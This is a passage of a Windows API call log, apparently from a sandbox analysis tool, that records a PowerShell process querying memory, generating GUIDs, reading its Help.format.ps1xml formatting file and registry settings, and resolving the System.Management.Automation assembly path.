	[0337.569] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.569] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa855959, Data2=0xd20a, Data3=0x464c, Data4=([0]=0x9b, [1]=0xb9, [2]=0x45, [3]=0x7d, [4]=0x5a, [5]=0xf1, [6]=0xad, [7]=0xe3))) returned 0x0
	[0337.569] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x532a63c9, Data2=0xc9e6, Data3=0x4098, Data4=([0]=0x9f, [1]=0xdf, [2]=0x51, [3]=0x5, [4]=0x80, [5]=0xa2, [6]=0x5e, [7]=0xda))) returned 0x0
	[0337.569] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x183e7715, Data2=0xe7cb, Data3=0x42a2, Data4=([0]=0x83, [1]=0x90, [2]=0x54, [3]=0x1d, [4]=0xa4, [5]=0xc7, [6]=0xce, [7]=0xf7))) returned 0x0
	[0337.569] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.569] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.570] SetErrorMode (uMode=0x1) returned 0x1
	[0337.570] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0337.570] GetFileType (hFile=0x2e4) returned 0x1
	[0337.570] SetErrorMode (uMode=0x1) returned 0x1
	[0337.570] GetFileType (hFile=0x2e4) returned 0x1
	[0337.570] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.571] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.571] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.967] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.967] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.975] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.977] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.977] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.979] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.980] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.981] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.982] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.982] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0xf37, lpOverlapped=0x0) returned 1
	[0337.982] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6e2b7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6e2b7*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0337.982] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e6ec18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec18*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0337.982] SetErrorMode (uMode=0x1) returned 0x1
	[0337.982] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0337.982] SetErrorMode (uMode=0x1) returned 0x1
	[0337.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0337.983] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x2e4) returned 0x0
	[0337.983] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0337.983] CoTaskMemAlloc (cb=0x5a) returned 0x1b724740
	[0337.983] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x1b724740, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0337.983] CoTaskMemFree (pv=0x1b724740) 
	[0337.983] RegCloseKey (hKey=0x2e4) returned 0x0
	[0337.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0337.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0337.987] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x57f63bab, Data2=0x863b, Data3=0x48cc, Data4=([0]=0x8e, [1]=0xcd, [2]=0x79, [3]=0x79, [4]=0x7a, [5]=0xcc, [6]=0x2f, [7]=0x80))) returned 0x0
	[0337.988] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x85377ea0, Data2=0xa845, Data3=0x4424, Data4=([0]=0x82, [1]=0xd4, [2]=0x15, [3]=0x1b, [4]=0xeb, [5]=0x47, [6]=0xec, [7]=0x44))) returned 0x0
	[0338.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.501] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xb0089ae1, Data2=0x4e75, Data3=0x474b, Data4=([0]=0x8d, [1]=0xa, [2]=0xa4, [3]=0x50, [4]=0xa7, [5]=0xfd, [6]=0x33, [7]=0x3b))) returned 0x0
	[0338.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
